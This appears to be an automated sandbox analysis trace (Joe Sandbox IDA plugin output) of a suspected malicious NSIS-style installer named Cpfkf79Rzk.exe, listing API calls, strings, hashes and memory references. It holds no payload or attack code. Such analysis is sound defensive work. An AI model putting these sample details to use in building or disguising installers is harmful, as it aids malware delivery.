                                                                                                        • Opcode ID: 1856695c990301f96b0bfae571b3bc84039281bd83faa45955c02c51b4778447
                                                                                                        • Instruction ID: 1fca52776cba06a1556b538b397dade1a16f07a9c9d6655049f3c7fe444e155e
                                                                                                        • Opcode Fuzzy Hash: 1856695c990301f96b0bfae571b3bc84039281bd83faa45955c02c51b4778447
                                                                                                        • Instruction Fuzzy Hash: B4A180F1A00209ABDB11AFA6CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                                                                                        APIs
                                                                                                        • DeleteFileW.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 004059BF
                                                                                                        • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A07
                                                                                                        • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A2A
                                                                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A30
                                                                                                        • FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A40
                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AE0
                                                                                                        • FindClose.KERNEL32(00000000), ref: 00405AEF
                                                                                                        Strings
                                                                                                        • "C:\Users\user\Desktop\Cpfkf79Rzk.exe", xrefs: 00405996
                                                                                                        • \*.*, xrefs: 00405A01
                                                                                                        • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004059A4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                        • String ID: "C:\Users\user\Desktop\Cpfkf79Rzk.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                                                                                        • API String ID: 2035342205-2239678096
                                                                                                        • Opcode ID: d3b1db4ec6e858d6de83fe0182b98463dfe8c84cfbcf579265b0cac0546164ac
                                                                                                        • Instruction ID: c51eb27d53b6fe35fd8e31d26e19e594c53701a60ebafcf50548af423f91ca56
                                                                                                        • Opcode Fuzzy Hash: d3b1db4ec6e858d6de83fe0182b98463dfe8c84cfbcf579265b0cac0546164ac
                                                                                                        • Instruction Fuzzy Hash: 0641B530A00914AACB21BB658C89BAF7778EF45729F60427FF801711D1D7BC5981DEAE
                                                                                                        APIs
                                                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404458
                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040446C
                                                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404489
                                                                                                        • GetSysColor.USER32(?), ref: 0040449A
                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A8
                                                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B6
                                                                                                        • lstrlenW.KERNEL32(?), ref: 004044BB
                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C8
                                                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044DD
                                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404536
                                                                                                        • SendMessageW.USER32(00000000), ref: 0040453D
                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404568
                                                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045AB
                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004045B9
                                                                                                        • SetCursor.USER32(00000000), ref: 004045BC
                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004045D5
                                                                                                        • SetCursor.USER32(00000000), ref: 004045D8
                                                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404607
                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404619
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                        • String ID: 1C@$: Completed$N$dL
                                                                                                        • API String ID: 3103080414-3936683301
                                                                                                        • Opcode ID: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                                                        • Instruction ID: 9026ebbe03bb6d5dcd5a9bde039089338ffc2a6a86adc40c9d49ddbc6b033b78
                                                                                                        • Opcode Fuzzy Hash: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                                                        • Instruction Fuzzy Hash: D161A3B1A00209BFDB109F60DD45EAA7B79FB94305F00853AF705B62E0D779A952CF68
                                                                                                        APIs
                                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                        • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                        • String ID: F
                                                                                                        • API String ID: 941294808-1304234792
                                                                                                        • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                                                        • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                                                                        • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                                                        • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                                                                        APIs
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
                                                                                                        • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14
                                                                                                          • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                                                          • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                                                        • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
                                                                                                        • wsprintfA.USER32 ref: 00405F4F
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F8A
                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F99
                                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
                                                                                                        • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00406038
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F
                                                                                                          • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                                          • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                        • String ID: %ls=%ls$[Rename]
                                                                                                        • API String ID: 2171350718-461813615
                                                                                                        • Opcode ID: 9fe56ee9aebbe4e8a82578a5ab6143b45b94006cc37f6f31d23d913fa1877209
                                                                                                        • Instruction ID: cb5629e100ec4411e7767e9ff1715c79388972a83a2f5f57e92a2ee479f5e204
                                                                                                        • Opcode Fuzzy Hash: 9fe56ee9aebbe4e8a82578a5ab6143b45b94006cc37f6f31d23d913fa1877209
                                                                                                        • Instruction Fuzzy Hash: 92313571240B19BBD230AB659D48F6B3A5CEF45744F15003BF906F72D2EA7C98118ABD
                                                                                                        APIs
                                                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00403334,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                                                        • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                                                        • CharNextW.USER32(?,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00403334,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                                                        • CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00403334,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Char$Next$Prev
                                                                                                        • String ID: "C:\Users\user\Desktop\Cpfkf79Rzk.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                                                                        • API String ID: 589700163-2587863014
                                                                                                        • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                        • Instruction ID: 9d8e3f8f3784457604ea521ff392e3c8e3efc90107dbe880bee10e7696629eb6
                                                                                                        • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                        • Instruction Fuzzy Hash: AB11B655800616A5DB303B18BC44A7762F8AF54B60F92403FED89736C5F77C5C9286BD
                                                                                                        APIs
                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 0040427F
                                                                                                        • GetSysColor.USER32(00000000), ref: 004042BD
                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 004042C9
                                                                                                        • SetBkMode.GDI32(?,?), ref: 004042D5
                                                                                                        • GetSysColor.USER32(?), ref: 004042E8
                                                                                                        • SetBkColor.GDI32(?,?), ref: 004042F8
                                                                                                        • DeleteObject.GDI32(?), ref: 00404312
                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 0040431C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2320649405-0
                                                                                                        • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                        • Instruction ID: 0f30b588a8d7f9bbf1461c481b53b443173021fc121084549064eaca6d41b1d8
                                                                                                        • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                        • Instruction Fuzzy Hash: CD2174716007059FCB319F68DE48A5BBBF8AF81711B048A3EFD96A26E0D734D944CB54
                                                                                                        APIs
                                                                                                        • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                          • Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E71
                                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                        • String ID: 9
                                                                                                        • API String ID: 163830602-2366072709
                                                                                                        • Opcode ID: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                                                        • Instruction ID: 3d8386ac743f87b5a59d0c6af2c48158715b6bf8f4fdb2ba716f86882e7a1e00
                                                                                                        • Opcode Fuzzy Hash: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                                                        • Instruction Fuzzy Hash: 46510A74D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D1D7B49982CB58
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BD1
                                                                                                        • GetMessagePos.USER32 ref: 00404BD9
                                                                                                        • ScreenToClient.USER32(?,?), ref: 00404BF3
                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C05
                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C2B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                        • String ID: f
                                                                                                        • API String ID: 41195575-1993550816
                                                                                                        • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                        • Instruction ID: ae0188e128420319643ad50796f74bd77cac7447aa244d18a8bf097087cf05ab
                                                                                                        • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                        • Instruction Fuzzy Hash: 9C019E7190021CBAEB00DB94DD81BFFBBBCAF95711F10412BBB10B61D0C7B499418BA4
                                                                                                        APIs
                                                                                                        • GetDC.USER32(?), ref: 00401DBC
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                        • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                        • String ID: Calibri
                                                                                                        • API String ID: 3808545654-1409258342
                                                                                                        • Opcode ID: 1acdf138dc74c3f4cbb002bee862ac271e9050b380170d6a443b5acebdec0054
                                                                                                        • Instruction ID: af8ff02f4bd052a881cb17574bfe8b5bbda2d2cac472569fbfdf17f98f113d3f
                                                                                                        • Opcode Fuzzy Hash: 1acdf138dc74c3f4cbb002bee862ac271e9050b380170d6a443b5acebdec0054
                                                                                                        • Instruction Fuzzy Hash: 39017571948240EFE7406BB4AF8ABD97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                                                        APIs
                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                        • MulDiv.KERNEL32(000D1CEE,00000064,000D1EF2), ref: 00402E3C
                                                                                                        • wsprintfW.USER32 ref: 00402E4C
                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                        Strings
                                                                                                        • verifying installer: %d%%, xrefs: 00402E46
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                        • String ID: verifying installer: %d%%
                                                                                                        • API String ID: 1451636040-82062127
                                                                                                        • Opcode ID: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                                                        • Instruction ID: 4bcbb139cde21edcf0ff7b700e9789e452b98774f77cb7efe3bd4e4e9d403b43
                                                                                                        • Opcode Fuzzy Hash: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                                                        • Instruction Fuzzy Hash: C701F47154020CABDF209F60DE49FAA3B69EB44705F008439FA45B51E0DBB995558F98
                                                                                                        APIs
                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                        • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 2667972263-0
                                                                                                        • Opcode ID: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
                                                                                                        • Instruction ID: 08f8d52deffd015bf7aba9006bc7b8b19cff7c85b8e7ef16137ebd65050c2e74
                                                                                                        • Opcode Fuzzy Hash: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
                                                                                                        • Instruction Fuzzy Hash: 1B218071C00528BBCF116FA5DE49D9E7E79EF08364F10023AF954762E1CB794D419B98
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                                                        • wsprintfW.USER32 ref: 00404B52
                                                                                                        • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                        • String ID: %u.%u%s%s$6B
                                                                                                        • API String ID: 3540041739-3884863406
                                                                                                        • Opcode ID: 45cae9be8c13eedb47404a8b3ee91442d476cfb775bff5969470e661b9022d33
                                                                                                        • Instruction ID: 22ef8b20c3cb34d9681d0f1950c5ee3b7e818b69147609aa9b6e87f13a537159
                                                                                                        • Opcode Fuzzy Hash: 45cae9be8c13eedb47404a8b3ee91442d476cfb775bff5969470e661b9022d33
                                                                                                        • Instruction Fuzzy Hash: 18110833A041283BDB10A96D9C46F9F329CDB85374F250237FA26F21D1DA79DC2182E8
                                                                                                        APIs
                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\slgtsbog\oblating.ini,000000FF,nerveklinikkernes,00000400,?,?,00000021), ref: 004025E8
                                                                                                        • lstrlenA.KERNEL32(nerveklinikkernes,?,?,C:\Users\user~1\AppData\Local\Temp\slgtsbog\oblating.ini,000000FF,nerveklinikkernes,00000400,?,?,00000021), ref: 004025F3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWidelstrlen
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\slgtsbog\oblating.ini$nerveklinikkernes
                                                                                                        • API String ID: 3109718747-606743028
                                                                                                        • Opcode ID: 117bdbcdfb20abded91d9bb1efc4a5bce906789812cb2159414a34963df76135
                                                                                                        • Instruction ID: 3dcd1766983357fa33eb9a2b17af164457a9c6038e68ae70dd04151361e6fae4
                                                                                                        • Opcode Fuzzy Hash: 117bdbcdfb20abded91d9bb1efc4a5bce906789812cb2159414a34963df76135
                                                                                                        • Instruction Fuzzy Hash: D7110872A00300BEDB146BB1CE89A9F76649F54389F20843BF502F61D1DAFC89425B6E
                                                                                                        APIs
                                                                                                        • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057FE
                                                                                                        • GetLastError.KERNEL32 ref: 00405812
                                                                                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405827
                                                                                                        • GetLastError.KERNEL32 ref: 00405831
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                        • String ID: C:\Users\user\Desktop
                                                                                                        • API String ID: 3449924974-3976562730
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                        Similarity
                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 1849352358-0
                                                                                                        APIs
                                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Timeout
                                                                                                        • String ID: !
                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403346,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B5F
                                                                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403346,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B69
                                                                                                        • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B7B
                                                                                                        Strings
                                                                                                        • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405B59
                                                                                                        Similarity
                                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                                        • API String ID: 2659869361-2382934351
                                                                                                        APIs
                                                                                                        • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                        • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                        • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                        • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                        Similarity
                                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                        • String ID:
                                                                                                        • API String ID: 2102729457-0
                                                                                                        APIs
                                                                                                        • IsWindowVisible.USER32(?), ref: 0040528F
                                                                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 004052E0
                                                                                                          • Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                        • String ID:
                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,771B3420,004038B7,004036CD,00000006,?,00000006,00000008,0000000A), ref: 004038F9
                                                                                                        • GlobalFree.KERNEL32(?), ref: 00403900
                                                                                                        Strings
                                                                                                        • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004038F1
                                                                                                        Similarity
                                                                                                        • API ID: Free$GlobalLibrary
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                                        • API String ID: 1100898210-2382934351
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(00438800,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BAB
